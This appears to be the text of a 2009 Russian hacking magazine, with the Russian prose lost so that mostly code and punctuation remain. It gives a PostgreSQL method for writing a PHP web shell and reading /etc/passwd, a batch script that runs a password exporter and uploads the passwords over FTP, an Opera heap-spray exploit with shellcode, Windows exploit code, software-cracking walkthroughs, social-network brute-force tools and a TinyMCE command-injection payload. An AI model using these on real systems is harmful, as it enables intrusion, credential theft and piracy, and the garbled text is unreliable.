#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
$updir = 'files'; #
$maxfsize = 2048; #
4
: sql PostgreSQL
:
,
MySQL MSSQL, PostgreSQL.
. ,
. , , , PostgreSQL
, , , , , . :
1. - ( x 01 /121/ 09
$sleep = 5; # ( 5)
$abort = 180; #
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
, , .
, , :).
, www.virustotal.com
,
. , ,
ChaaK
.
,
).
2.
(
load_file()
MySQL).

PostgreSQL
.
- - PostgreSQL, :
1. (, table_file).
2. - (,
<? passthru($_GET[cmd]); ?>).
3. (-) , -.
041
>>
:
CREATE TABLE table_shell(column_shell TEXT NOT NULL);
INSERT INTO column_shell VALUES('<? passthru($_
GET[cmd]); ?>');
COPY table_shell (column_shell) TO '/var/www/html/
shell.php';
4. :
COPY (SELECT '<?php system($_GET[cmd]); ?>') TO 'FILE_
NAME'
, -, .
1. ( load_file()
MySQL):
CREATE TABLE table_file(column_file TEXT NOT NULL);

COPY table_file (column_file) FROM '/etc/passwd';
SELECT * FROM table_file;
2. n m :
pg_read_file('bla.txt',n,m)
( n m )
3. :
pg_ls_dir('/tmp')
4. :
pg_stat_file('users.txt')
, . :).
5
: PE-
API-,
DLL
:
IID King 2.0,
PE-
.
1. wasm.ru DVD IID King.
2. , ,
, Pick
a file.
3. dll, ,
Click to pick DLL(s) and their API(s) to add.
4. , API-,
Add Them!.
5. API
Add Them!, Backup

( bak-
). !
, DLL.
6
: exe-
:
, . , ,
? ,
,
ExeScript, .bat-,
.vbs- .js- -.
:
1. DVD.
2. .
3.
( vbs/js-).
4. .
5. exe.
,
,
-. :
042
exe
@echo off
Echo open xxx.xxx.
xxx.xxx>go.txt&&echo
ftpuser>>go.txt&&echo
12345>>go.txt&&echo
get passexport.
exe>>go.txt&&echo
bye>>go.txt
Echo open xxx.xxx.xxx.
xxx>send.txt&&echo
ftpuser>>send.txt&&echo
12345>>send.txt&&echo
send pass.txt>>send.
txt&&echo bye>>send.txt
ftp -s:go.txt > nul

passexport.exe pass.txt
ftp -s:send.txt > nul
del go.txt send.txt passexport.txt pass.txt name.bat
, , ?
,
.
x 01 /121/ 09
>>
: HTTP-
SMTP-
:

HoSproxy HTTP over SMTP Proxy.
: HoStunnel
HoSproxy.
Windows. HoStunnel
,
25 (TCP SMTP).
:
(
), .

HTTP-
.
HoSproxy ,
Hostunnel
HTTP-proxy (tcp 8080),
. HTTP-
. , :
1. HoSproxy edge-security.com/hosproxy.php (
DVD).
2. Hospoxy.cfg :
# SMTP- :
#smtp.myserver.com
local_smtp_server=
# (Y/N)
smtp-auth=N
smtp-user=cdelojo@edge-security.com
smtp-pass=
#
(pop, imap, #imapssl, popssl)
mail_retrieve_protocol=pop
#
#pop3.myserver.com
mail_access_server=
#
mas_user=cdelojo@edge-security.com
#
mas_passwd=
#, WEB-
email=cdelojo@edge-security.com
# HTTP-
ext_email=asdf@ligual.net
3. hosproxy.exe .
RNMAP
:

:
, - . , , ,
. , (
, host-based ips .). ,
Rnmap.
1. NMAP (rnmap.sourceforge.net).
2. rnmapadduser.py vasia.
3.
telnet Grnmap.py .
Nessus.
- (t1shopper.com/tools/portscanner). , , .
,
NMAP, . z
x 01 /121/ 09
043
>>
Windows ,
, , .
RPC DCOM,
MSBlast. , , ,
Gimmiv! KernelBot.dg, . !
01
MS Windows
>> Brief
2008 Thomas Unterleitner
phion AG (Marius Wachtler,
Michael Burgbacher, Carson Hounshell Michael Craggs)
TCP/IP- .
Microsoft VISTA TCP/IP stack buffer overflow,

. , TCP/
IP- .
, ExAllocatePoolWithTag,
32 ( API-
CreateIpForwardEntry2, iphlpapi.
dll, 32, 64
Windows Vista). MSDN,
MIB_IPFORWARD_ROW2, PrefixLength

32 ( ). , PrefixLength
DWORD, memcpy. .
, shell-.
CreateIpForwardEntry2 ,
, , , , (
, ). 64
Windows ,
.
, Service Pack 1! 64 XP
, MIB_IPFORWARD_ROW2.
PrefixLength ,
!
Server 2003. ,

, ... ,
,
.

,

,
044
,
. , .
securityfocus.com/archive/1/498471.
.
>> Targets
Vista Home/Business/Enterprise/Ultimate x32/x64 SP0/SP1
>> Exploit
exploit, , Thomasa
Unterleitnera securityfocus.com/data/vulnerabilities/
exploits/32357.c. .
IP- !
- .
IP- .
exploit,

MIB_IPFORWARD_ROW2 route;
route.InterfaceIndex = atoi(argv[1]);
route.DestinationPrefix.PrefixLength = atoi(argv[2]);
route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr =

inet_addr('1.2.3.0');
route.NextHop.Ipv4.sin_addr.s_addr =

inet_addr("11.22.33.44");
route.Protocol = MIB_IPPROTO_NETMGMT;
route.Origin = NlroManual;
route.ValidLifetime = 0xffffffff;
route.PreferredLifetime = 0xffffffff;
route.Metric = 1;
CreateIpForwardEntry2(&route);
>> Solution
Microsoft , ,
. , ,
, .
.
02
MS Windows

>> Brief
, ,
support#killprog.com.
x 01 /121/ 09
>>
API- UnhookWindowsHookEx ( )
( API-
SwitchDesktop) win32k.sys, . , API-
!
. ,
( ) .
, .
exploit, support#killprog, ,
API-
Sleep(0)
. exploit
. ,
(, ) . exploit
, Windows
. murphy-law.
net.ru securityfocus.com/bid/32206.
>> Targets:
Server 2003 Standard/Enterprise/Datacenter x32/
x64 Vista Home/Premium/Ultimate x32/x64. , , .
>> Exploit
exploit, ,
securityfocus.com/data/vulnerabilities/exploits/whk.zip
Microsoft Visual C++ exe/dll
( ).
>> Solution
! , Microsoft
, . , ,
( , ). ,
.
Server 2003 USER32.
DLL , UnhookWindowsHookEx
SwitchDesktop
.
03
Opera

>> Brief
, , . (
), ,
shell-.
2008

( ~16,500 ) URL file. Security
Focus ( securityfocus.com/bid/32323)
,
HTML- exploit. , , offline,
. ,
, . ,
:).
x 01 /121/ 09
>> Targets
9.6 9.62.
>> Exploit
exploit, ,
milw0rm.com/exploits/7135, .
exploit,
<script>
var i=0;
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape(%ue8fc%u4100);
while (block.length < 81920) block += block;
var memory = new Array();
for (;i<1000;i++) memory[i] += (block + shellcode);
var evil = "file://";
for(var i = 0; i<16438; i++) evil += "X";
evil += "R."; window.location.replace(evil);
</script>
>> Solution
, , .
, .
04
MS Windows
RPC
>> Brief
2 2008 (
) 20
.
, RPC. Windows 2000 /Server 2008
. 32,
64, . Trojan-Spy:W32/Gimmiv.A/B/C, W32/Conficker.worm, Trojan:
Win32/Wecorl.A/B, Trojan:Win32/ Clort.A/!exploit/dr, TrojanDownloader:
Win32/VB.CQ/CJ ,
, .
exploit ,
,
.
Microsoft , , ( ),
! Microsoft
, (
, ).
, .
, : microsoft.com/technet/security/Bulletin/ms08-067.mspx securityfocus.
com/bid/31874, http://blogs.technet.com/swi/ blogs.msdn.com/sdl/
archive/2008/10/22/ms08-067.aspx.
exploit
>> Targets

NT- : W2K
Professional/ Server/Advanced/
Datacenter SP0/SP1/SP2/SP3/
SP4, XP Gold/Home/Professional
SP0/SP1/ SP2/SP3 x86/x86-64, Vista
045
>>
Home/Business/ Enterprise/ Ultimate SP0/SP1 x86/x86-64, S2K3 Standard/
Datacenter/Advanced/Enterprise SP0/SP1/SP2 x86/x86-64/ Itanium, S2K8
Standard/Datacenter/Advanced/Enterprise SP0 x86/x86-64/ Itanium.
>> Exploits
exploit , ... , ,
,
(W2K, XP, S2K3).
S2K8 exploit , ,
! ,
:
1. MS08-067 Remote Stack Overflow Vulnerability Exploit by Polymorphours
W2K, , : milw0rm.com/
exploits/7104.
2. MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) W2K
S2K3[SP2], , : milw0rm.com/
exploits/7132.
3. MS08-067 Exploit for CN by EMM@ph4nt0m.org , XP, S2k3 . ,
exploit, : milw0rm.com/sploits/2008MS08-067.rar.
4. MS08-067 Gimmiv Worm.A ( ): offensivecomputing.net/
?q=ocsearch&ocq=d65df633dc2700d521ae4dff8c393bff
>> Solution
Microsoft , , (
microsoft.com/technet/security/Bulletin/ms08-067.mspx)
,
. 139 445
, . - ,
, 5c
00 2e 00 2e 00 5c 00 (\..\), 2f 00 2e 00 2e 00 2f 00 (/..), 5c 00 2e 00 2e
00 2f 00 (\../) 5c 00 2e 00 2e 00 2f 00 (/..\).
(kpnc.org/ftp/MS08067.zip, 123456). RPC
SRVSVC ,
( ).
,
.
>> Disclose
,
/exploit.
,
, , ? ? , ,
exploit .
, Microsoft,
. , - RPC ,
, ! ,
. Microsoft ,
, .
,
, W2K S2k8.
, W2K, Windows2000KB958644x86RUS.EXE,
CAB-. ? exe HIEW, MSCF.
.cab, Windows compress.exe RAR, netapi32.
046
Gimmiv.A,
I_NetPathCanonicalize,
\..\
dll, . : XP
, exe , ,
. ,
.
IDA-Pro BinDiff PatchDiff,
, : http://cgi.tenablesecurity.com/tenable/
patchdiff.php.
netapi32.dll netapi32_o.dll,
IDA-Pro .
, netapi32.dll ( netapi32_p.dll), ,
Edit\Plug-ins, PatchDiff netapi32_o.idb.
, PatchDiff ,
21 .
,
( Graph). , I_NetPathCanonicalize
( ).
.
1.
Jump to Code .
netapi32.dll
7CD1AA3E
push
0
; char
7CD1AA40
lea
eax, [ebp+UncServerName]
7CD1AA46
push
eax
; Dest
7CD1AA47
lea
eax, [ebp+var_20]
7CD1AA4A
push
eax
; int
7CD1AA4B
push
[ebp+Buffer]
; Buffer
7CD1AA4E
NetpIsRemote
netapi32.dll
7CD1FB7D
push
7CD1FB7F
push
7CD1FB84
lea
0
; char
104h
; int
eax, [ebp+UncServerName]
x 01 /121/ 09
>>
MS HIEW
7CD1FB8A
7CD1FB8B
7CD1FB8E
7CD1FB8F
7CD1FB92
push
lea
push
push
call
eax
eax, [ebp+var_20]
eax
[ebp+Buffer]
NetpIsRemote
; Dest
; int
; Buffer
!
NetpIsRemote(Buffer, int, Dest, char),
NetpIsRemote(Buffer, int, Dest, char, 0x104).
, 0x104
, . , .
NetpwPathCanonicalize(),
sub_7CD1AB28, :
,
7CD1AB53
push
[ebp+Source]
;
7CD1AB56
call
edi
;
7CD1AB5B
cmp
eax, ebx
7CD1AB5D
ja
short loc_7CD1ABCF
7CD1AB5F
push
[ebp+Source]
;
7CD1AB68
push
eax
;
7CD1AB69
call
ds:__imp_wcscat
7CD1AB8D
lea
eax, [ebp+Str]
7CD1AB93
push
eax
7CD1AB94
call
sub_7CD1ABD9
7CD1AB9D
lea
eax, [ebp+Str]
7CD1ABA3
push
eax
;
7CD1ABA4
call
edi
;
7CD1ABA6
lea
eax, [eax+eax+2]
7CD1ABB4
lea
eax, [ebp+Str]
7CD1ABBA
push
eax
;
7CD1ABBB
push
[ebp+Dest]
;
7CD1ABBE
call
ds:__imp_wcscpy
Str
__imp_wcslen
Source
Dest
Str
__imp_wcslen
Source
Dest
wcslen()/wcscpy().
bug-free ,
,
/, \ ., - \..\ :

7CD1ABD9
sub_7CD1ABD9 proc near

; CODE XREF: sub_7CD1AB28+6C^p
7CD1ABD9
7CD1ABE0
mov
edi, [esp+14h+arg_0]
'/'
7CD1ABE4
push
7CD1ABE6
pop
esi
7CD1ABE7
xor
edx, edx
7CD1ABE9
mov
ax, [edi]
'\'
7CD1ABEC
push
7CD1ABEE
pop
ebx
7CD1ABEF
xor
ebp, ebp
7CD1ABF1
cmp
ax, bx
7CD1ABF4
mov
[esp+14h+var_4], edx
7CD1ABF8
jz
loc_7CD1EB17
x 01 /121/ 09
7CD1ABFE
cmp
ax, si
7CD1AC01
jz
loc_7CD1EB17
7CD1AC07 loc_7CD1AC07:
; CODE XREF: sub_7CD1ABD9+3F51v
7CD1AC07
test
ax, ax
7CD1AC0A
mov
esi, edi
7CD1AC0C
jz
short loc_7CD1AC2B
7CD1AC0E loc_7CD1AC0E:
; CODE XREF: sub_7CD1ABD9+60vj
7CD1AC0E
cmp
ax, bx
7CD1AC11
jz
loc_7CD273A8
7CD1AC17
cmp
ax, '.'
7CD1AC1B
jz
loc_7CD273BB
, , sub_7CD1ABD9() . . exploit
SRVSVC I_NetPathCanonicalize
I_NetPathCompare. , .
,
4B324FC8-1670-01D3-12785A47BF6EE188:
I_NetPathType;
I_NetPathCompare;
I_NetNameValidate;
I_NetNameCompare;
I_NetListCanonicalize;
I_NetPathCanonicalize
I_NetNameCanonicalize;
I_NetServerSetServiceBits;
I_NetServerSetServiceBitsEx;

( )
\..\ - /../, /..\, \../ (
S2k3/S2k8).

,
. MSDN, SRVSVC
: msdn.microsoft.com/en-us/library/cc213209.
aspx. (hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.
html) . !
. ,
shell-
.
JMP ESP/CALL ESP (FFE4h/FFD4h),
netapi32.dll, .
, Windows,
.
,
. , Metaspoit.
DEP, ,
API- VirtualAlloc VirtualProtect,
( Google
return2libc).
exploit .
. ,
/ , shell-, .
DVD. z
047
>>
Cr@wler
/ crawlerhack@rambler.ru /
qip
-
, , ,
, .
,
, - QIP.

Easyhack , QIP ,
MessageBoxA. ,

, ,
, QIP
.
,
.
qip.exe ,
.
, , OllyDbg. , ,
QIP .
. , QIP ,
. ,
, : -
nop
.
, .
:).
, -
PE- ( , , )
, .
, :
068F4BA PE-
048
. , .
:
0048023F
00480242
00480246
00480248
. 8B45 FC
. 807D FB 00
74 0F
E8 B740F8FF
MOV EAX,DWORD PTR SS:[EBP-4]

CMP BYTE PTR SS:[EBP-5],0
JE SHORT qip_modi.00480257
CALL qip_modi.00404304
, -
, .
00480246 <shift+F9>.
: .
,
<shift+F9> , CALL 00404304, (
, Undo Selection).
nop <shift+F9>. <shift+F9>, , Undo
Selection, .
, ,
?
.
, . , .
, -
, , !
x 01 /121/ 09
>>
warning
,

,

.

,

, ,
.

, EBX (
, , ;
) 0064ED7C.
, , , . , 0068F857.
, 00480248,
.
00480248 jmp 0068f857
, ,
0048024D .
:
, API-:
. MSDN, .
CreateFileW.
(
, ):
hTemplateFile -,
;
Attributes ;
Mode ;
pSecurity ;
ShareMode ;
Access ;
0068F857 CMP EBX,0064ED7C ; ebx , , ,

0068F85D JNZ 0068F864 ; 0064ED7C, ...
0068F85F JMP 0048024D ; ...
( qip.exe)
0068F864 PUSH 0048024D ;
...
0068F869 JMP 00404304 ; ...
,
, !
,
: -.

, ,
. ,
x 01 /121/ 09
049
>>
FileName .
( ).
WriteFile. :
BOOL WINAPI WriteFile(
__in
HANDLE hFile,
__in
LPCVOID lpBuffer,
__in
DWORD nNumberOfBytesToWrite,
__out_opt
LPDWORD lpNumberOfBytesWritten,
__inout_opt LPOVERLAPPED lpOverlapped
);
:
hFile ;
Buffer , ;
nNumberOfBytesToRead ;
lpNumberOfBytesRead
;
lpOverlapped OVERLAPPED
().
, ,
0068F86E. . (
, , EASYHACK 2008 ),
,
, ( [ebp-8]) :
00649A01
00649A06
00649A0A
CALL qip.004678B4
CMP DWORD PTR SS:[EBP-8],0
JE SHORT 0649A2F
0068F88A
. 50
PUSH EAX ; /hObject
3. WriteFile .
, , API-:
, .
, 0068F8EB.
,
VirtualProtect NewProtect = PAGE_EXECUTE_
READWRITE. VirtualProtect
0068F8B7 (
PUSHAD). MOV
, ,
0068F8EB. :
; WriteFile :
0068F88B PUSH 0
; |/pOverlapped = NULL
0068F88D PUSH EBP
; ||pBytesWritten
0068F88E PUSH 10
; ||nBytesToWrite = 10 (16.)
0068F890 PUSH qip_modi.0068F8EB

; ||Buffer = qip_modi.0068F8EB
0068F895 PUSH EAX
; ||hFile
0068F896 CALL kernel32.WriteFile ; |\WriteFile
; CloseHandle ,
"PUSH EAX", 0068F88A:
0068F89B CALL CloseHandle
; ,
VirtualProtect :
0068F8A0 POPAD
, , CALL-, ,
( cmp je). ,
:
00649A01
00649A06
00649A0B
CALL qip_modi.004678B4
JMP 0068F86E
NOP
; qip.exe
0068F8A1 JMP qip_modi.00649A0B
; , CreateFileW:
0068F8A6 NOP
0068F8A7 UNICODE "log.txt",0

? . 0068F86E .
1. CreateFileW . API EAX .
0068F86E > 6A 00
PUSH 0 ; /hTemplateFile = NULL
0068F870 . 68 80000000 PUSH 80 ; |Attributes = NORMAL
0068F875 . 6A 04
PUSH 4 ; |Mode = OPEN_ALWAYS
0068F877 . 6A 00
PUSH 0 ; |pSecurity = NULL
0068F879 . 6A 03
PUSH 3 ; |ShareMode = FILE_SHARE_
READ|FILE_SHARE_WRITE
0068F87B . 68 000000C0 PUSH C0000000 ; |Access =
GENERIC_READ|GENERIC_WRITE
0068F880 . 68 A7F86800 PUSH qip_modi.0068F8A7
;
|FileName = "log.txt"
0068F885 . E8 D60E187C CALL kernel32.CreateFileW ;
\CreateFileW
2. EAX
CloseHandle,
.
; :
0068F8B7 PUSHAD
; VirtualProtect
:
0068F8B8

0068F8BD

0068F8BF

0068F8C4

0068F8C9

PUSH 32F7D0
; /pOldProtect = 0032F7D0
PUSH 40
; |NewProtect = PAGE_EXECUTE_READWRITE
PUSH 0FF
; |Size = FF (255.)
PUSH qip_modi.0068F8EB
; |Address = qip_modi.0068F8DD
CALL kernel32.VirtualProtect
; \VirtualProtect
;
, 0068F8EB:
; 4 ...:
050
x 01 /121/ 09
>>
QIP . :)
0068F8CE
0068F8D2
0068F8D4
0068F8D9
MOV
MOV
MOV
MOV
ECX,DWORD PTR DS:[EBP-8]

EDX,DWORD PTR DS:[ECX]
ECX,qip_modi.0068F8EB
DWORD PTR DS:[ECX],EDX
;... 4 :
0068F8DB
0068F8DF
0068F8E2
0068F8E7
MOV
MOV
MOV
MOV
ECX,DWORD PTR DS:[EBP-8]

EDX,DWORD PTR DS:[ECX+4]
ECX,qip_modi.0068F8EF
DWORD PTR DS:[ECX],EDX
;
, -:
0068F8E9 JMP SHORT qip_modi.0068F86E
.
:
00649A06 JMP 0068F86E
, VirtualProtect, .
0068F8E9 :
! , .

VirtualProtect ,
.
WriteFile, , . ,
. , ,
.
, !
, -, . -,
, , . -,
. ,
. ,
,
QIP, - . :
-,
QIP, ,
.
(, ) . ,
.

. ! z
00649A06 JMP 0068F8B7

x 01 /121/ 09
051
>>
Balashek
BBS, , . , , .
.
. . , , .
, ?

. - . , .
,

, .
: -
? ?
.
, , . !
052

?
,
.
, , ,
. :
1. ( ,
: ,
, , , / ).
, . .
2. (
,
x 01 /121/ 09
>>
). ,
.
.
3. ( , , ,
).
4. (,
, ). .
, ,
. ,
( ) . . .
///
, www.
vkontakte.ru www.odnoklassniki.ru, -.
/// . (
),
. , , , .
- Chaaka
Vkontakte PM spamer. ,
:).
:

, [name]
[lastname]

Ajax

, - 777
:
[name] .
[lastname] .

[:] (
,
, 1 ).
cURL , . ,
:). ,
Vkontakte.ru TOOLs Smapt.

. - :
1 / 70 50 . , vkontakte.ru bruteforce with multi-threads
C!klodoL. :
1. ActivePerl .
2. :
$dic = 'passl.txt'; #
$id = 111111; #id
$mail = 'mail%40mail.com'; #, @
%40
$threads = 4; #
info
/
,

.

.

!
3. .
x 01 /121/ 09
053
>>
IP DDoS
Vkontakte Tools
: http://vkontakte.ru/opinions.
php?id=. , !
,
, , , :
http://vkontakte.ru/infested_ip_list.html.
IP-, 100% ( ) DDoS vkontakte.ru. The List
of 17029 Infested IP Addresses:
:)
warning
!

!
,

!
054
4. good.txt
. .
Odnaklassniki
cheker Vid0k, PHP.
, (
DVD).
, , (,
,
,
-). ,

.
¯
( ). ,
, ¯
.

.
‮ ( ).

:
1. ID .
. http://vkontakte.
ru/friend.php?id=. id= ID
.
2. :
: http://vkontakte.ru/photos.
php?act=user&id=.
: http://vkontakte.ru/photos.php?id=.
: http://vkontakte.ru/video.php?id=.
: http://vkontakte.ru/notes.php?id=.
121.0.133.32
121.0.134.65
121.0.134.70
121.0.135.1
121.0.135.124
121.0.135.14
121.0.135.34
12.107.192.164
121.100.111.216
121.100.96.91
121.11.132.44
121.11.174.93
121.11.182.39
121.11.183.185
121.11.185.147
121.124.193.6
121.125.101.160
121.125.205.51
121.125.241.60
, , IP :). :
http://vkontakte.ru/test.html
http://vkontakte.ru/admin.html
http://vkontakte.ru/captcha.php
http://vkontakte.ru/index.php?=PHPB8B5F2A03C92-11d3A3A9-4C7B08C10000
,
,
:).

. z
x 01 /121/ 09
>>
_A1!3N

, . ,
, , ,
-
.
.
,
( ,
).
Win-
z, !. , 3D- . -
3D- , Win-. 3D
, Windows ( ,
) WinApi
. , SendMessage .
3D 3D-, ,
, .
, ,
,
.
, ( , - ..). -
056
, .
, . , , MD5, RSA ,
( ) .
,
. ( , ) . , ,
. user mode (OllyDbg, MS Dbg)
3D-.

, .
3D-, 3D-,
, (OpenGL),
(OpenGL)
. : x 01 /121/ 09
>>
_A1!3N
, ( ,
, ,
, , , ) . , :
1. API-,
(glOrtho);
2. API-,
(glEnable(GL_BLEND), glBlendFunc(GL_SRC_ALPHA, GL_ONE_
MINUS_SRC_ALPHA), glColor4f...);
3. .
, .
, -
Screensaver download !
:). , Windows
, System32, *.scr ,
... !
OpenGL
ElectriCalm 3D Screensaver.
IDA ( , ,
, ). . x 01 /121/ 09
PE Executable (*.scr *.exe). ,

, Imports.
gl_ , OpenGL.
glOrtho.
DATA XREF: ,
glOrtho. .
.data:0043A2CC glOrtho
dd ? ; DATA XREF: sub_405350+44
, ( IDA sub_
405350) 0x405350. ? glOrtho,
, N Rename
Call_Ortho.
CODE XREF: , ,
, , Call_Ortho.
; CODE XREF: sub_403C10+E02
; sub_405110+2A
(sub_403C10+E02) :
004049DC
004049E1
push
call
0BE2h
glEnable
;.
;glEnable(GL_BLEND);
057
>>
Hiew
OpenGL-
004049E7
push
303h
004049EC
push
302h ;. . ( )
004049F1
call
glBlendFunc ;glBlendFunc(GL_SRC_
ALPHA, GL_ONE_MINUS_SRC_ALPHA);
004049F7
mov
ebx, [ebp-34h]
004049FA
push
ebx
; ( )
004049FB
push
0
004049FD
push
0
004049FF
push
0
;.
. ALPHA
00404A01
call
glColor4f ;glColor4f(RED,GREEN,BLUE
,ALPHA)
00404A07
push
0DE1h
;.
00404A0C
call
glDisable ;glDisable(GL_TEXTURE_2D)
00404A12
call
Call_Ortho ;glOrtho... . .
00404A17
push
7
;
00404A19
call
glBegin
;glBegin(GL_QUADS)
,
. , ,
,
. (glDisable(GL_TEXTURE_2D))

, .
push 7 0x00404A17 push 0,
glBegin(GL_POINTS). OpenGL
, . glBegin
.
OpenGL, .
OllyDbg, Hiew. Hiew ElectriCalm 3D Screensaver.scr
<Enter> , .
<F5> 0x00404A17,
, ,
PE-, . <Enter>.
(6A 07) -
push 7. <F3>, 6A 00.
<F9> .
(, , OpenGL ,
), - . ,
058
! , ,
-.
sub_405110 (
PrintStringLine), , .
, Call_Ortho,
, ,
. (
, , , , ..).

. . , (
NOP 0x90,
push...) - (glBegin,
glVertex). glVertex3f
x, y, z. (, 0),
3D-: . :
glColor4f -,
0.0 1.0 :
004049F7 mov ebx, [ebp-34h] ; [ebp-34h] EBX
004049F7 xor ebx, ebx ;

EBX (EBX = 0) = 0
NOP. - , -.
ASSEMBLER, OllyDbg.
:
1. OllyDbg, ElectriCalm 3D Screensaver.scr.
2. <Ctr+G>
004049F7.
3. , xor ebx, ebx.
(OllyDbg NOP ).
4. Copy to executable
All modifications.
5. Copy all.
6. Save file c .
3D Formula 1 Screensaver.
. glOrtho,
, CallOrtho ,
. Color4f Vertex3f. ,
. ,
. :
, ,
. , OpenGL,
x 01 /121/ 09
>>
3D-
(RenderFunc
IDA) API- SwapBuffers
glutSwapBuffers, - glut, -
Windows - .
SwapBuffers, . ,
, ( ,
). SwapBuffers :
extrn SwapBuffers:dword

; DATA XREF: sub_406320+281
; sub_417379+6FC
, . :
00417A3F
test
ecx, ecx
00417A41
jnz
short loc_417A54

; <---Vot on, beyte ego
00417A43
push
offset unk_452710
00417A48
mov
edx, [ebp+arg_0]
00417A4B

push
edx
00417A4C
call
sub_4065BB
00417A51
add
esp, 8
00417A54 loc_417A54:

; CODE XREF:
RenderFunc+6C8
00417A54
call
sub_4068F0
00417A59
call
sub_405D40
00417A5E
push
1
00417A60
call
sub_405CF0
00417A65
add
esp, 4
00417A68
call
ds:glFlush
00417A6E
call
ds:wglGetCurrentDC
00417A74
push
eax
; HDC
00417A75
call
ds:SwapBuffers

, ,
.
, . ,
0x00417A41,
sub_4065BB. ,
Call_Ortho, glColor4f,
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_
ALPHA), ,
OpenGL, . sub_4065BB 75 EB.
jne 000417a54 (7511) 7511
EB11. (
x 01 /121/ 09
ECX) Jmp. , ,
.

DirectX
, , DirectX
COM. ,
,
.
. , COM
. ,
DirecX,

.
, OpenGL-,
. ,
. RenderFunc?
, 3- .
( IDA
On_Idle),
.
RenderFunc,
. DirectX-: Spirit of
Fire 3D Screensaver. IDA.
, , RenderFunc.
, , API-, , PeekMessage
( , PeekMessage
RenderFunc). ,
sub_40A4A0, ,
0x0040A4A0. On_Idle.
WaitMessage Call sub_403910.
OnIdle, . ? ,
( 1...3). ,
. , , ,
, ,
Jcc :
00403C1B
00403C21
00403C27
00403C29
00403C2B
00403C31
00403C37
00403C39
00403C3B
00403C3D
00403C42
call
mov
test
jnz
mov
mov
sub
cmp
jb
call
jmp
timeGetTime
ecx, ds:dword_49A17C
ecx, ecx
short loc_403C49
edx, ds:dword_49A1A4
ecx, ds:dword_497110
eax, edx
eax, ecx
short loc_403C44
sub_401110
short loc_403C49
;(1)
;(2)
info

(,
-

,
, ,

NOP 0x90...):
1. .
Windows 95.
2. .
.
.
3. .,
., .
OpenGL.
.
059
>>
DirectX
00403C44
00403C49
00403C4E
00403C50
00403C51
00403C54
00403C5A
00403C60
00403C66
00403C68
00403C6D
00403C6F
call
mov
mov
push
call
mov
imul
mov
test
mov
jnz
mov
sub_401390
eax, ds:dword_4A0854
ecx, [eax]
eax
dword ptr [ecx+18h]
edx, ds:dword_4A085C
edx, 4CCh
eax, ds:dword_49ACD4[edx]
eax, eax
eax, ds:dword_4A0844
short loc_403C8B
;(3)
ecx, [eax]
sub_401110, 0x00403C3D, , API- (ExtTextOut, SetTextColor...),

, UNREGISTERED
VERSION!, Press the space bar to find out. ? , . sub_
401390 0x00403C44.
Remaining time: %u sec.. -,
.
, , Jnz (1)
; :
75 EB.
Atlantis 3D Screensaver.
,
( 0x0042414F). , -
060
( WinAPI) On_Idle (
0x004241B3). RenderFunc.
... :
0042839A
call
dword ptr [eax+4Ch]
? , EAX.
:
00428392
mov
edx, [ebp+var_C] ; EDX var_C=ebp-0Ch
00428395
mov
eax, [edx]
; EAX var_C, On_Idle:
004281CC
mov
[ebp+var_C], ecx ; [ebp+var_C] On_Idle
, ECX, , ..
, ECX.
004241AD
mov
ecx, [ebp+var_4C8] ; ECX

? :
00423EA4
mov
[ebp+var_4C8], ecx ; [ebp+var_4C8] sub_423E9B
ECX (sub_423E9B)
. , :
x 01 /121/ 09
>>
IDA !
0044C395
mov
ecx, offset unk_56EF30 ; ECX
unk_56EF30
! , ,
ASSEMBLER. , ECX
, this ++, ,
, ( = (this+4Ch)). , ,
, ? this=unk_56EF30
. , .
OllyDbg, , 0x0056EF30 (
, Go to Expression, 0056EF30)
0x18744900.
Intel (
), 0x00497418,
0x00497418 + 0x4C = 0x00497464, , ,
0x00454a87 . IDA:
sub_454A87 ,
, . , ,
NOP. , .
.
Call. - ,
,
. ( ),
, ! (0x00454B0C)
(0x00454B08), . -, ,
, FPS. - , .
! sub_428670 ,
3 .
. : , ,
. -
. , ,
,
, ( ).
IDA . , . ,
, , . ,
.
x 01 /121/ 09
00429712 jz
loc_429A91
, .
:
004292C3 jz
loc_429680
!
Christmas Time 3D Screensaver
.
, On_iDle RenderFunc .
. ,
, , , . IDA, On_Idle.
, 0x0041295F. , -
, . ,
On_Idle inline-, . , On_Idle , RenderFunc. RenderFunc
: Jcc 0x00413344. , ,
. 0x004132DC, 0x004132EE.
, . Jcc
0x00413282, ! , RenderFunc.
. sub_406C07 ,
, RenderFunc. sub_4091FA,
50 , ,
Bliss, Lamp_off01.tga... ,
0x0040AA18.
?
, , ( ) 3- -.
, , ( , )
, , , ASProtect.
stripper. - 3D-
, - ,
- .
: . ,
3D-. z
061
>>
/ icq 884888, http://wap-chat.ru /
PHP-
WordPress, Joomla, Drupal, Moodle , , CMS, PHP. , -: kses, Snoopy SpellChecker

TinyMCE?
,
: XSS code exec. ,
CMS.

code exec
WYSIWYG- TinyMCE.
TinyMCE , ,
, WordPress 2.0.x-2.7.x
./wp-includes/js/tinymce/plugins/spellchecker.
: Google, PHP- PSpell,
win- nix- aspell.
config.php :
<?php
$config['general.engine'] = 'GoogleSpell';
//$config['general.engine'] = 'PSpell';
//$config['general.engine'] = 'PSpellShell';
...
$config['PSpellShell.mode'] = PSPELL_FAST;
$config['PSpellShell.aspell'] = '/usr/bin/aspell';
$config['PSpellShell.tmp'] = '/tmp';
...
?>
062
, ,
TinyMCE. , $config[general.engine] = PSpellShell;
.
.
RPC- ( 3 TinyMCE 2.5 WordPress, POST
GET-).
lang

./wp-includes/js/tinymce/plugins/spellchecker/classes/
PSpellShell.php:
function _getCMD($lang) {
$this->_tmpfile = tempnam(
$this->_config['PSpellShell.tmp'], "tinyspell");
if(preg_match("#win#i", php_uname()))
return $this->_config['PSpellShell.aspell'] .
" -a --lang=". $lang . " --encoding=utf-8 -H < "
. $this->_tmpfile . " 2>&1";
x 01 /121/ 09
>>
return "cat ". $this->_tmpfile ." | " . $this->_

config['PSpellShell.aspell']
. " -a --encoding=utf-8 -H --lang=". $lang;
}
evil-
JSON-. POST-,
rpc.php, :
{"method":"getSuggestions","params":["en; _EVIL_"]}
, , :). .

, , Snoopy PHP-, .
, , .
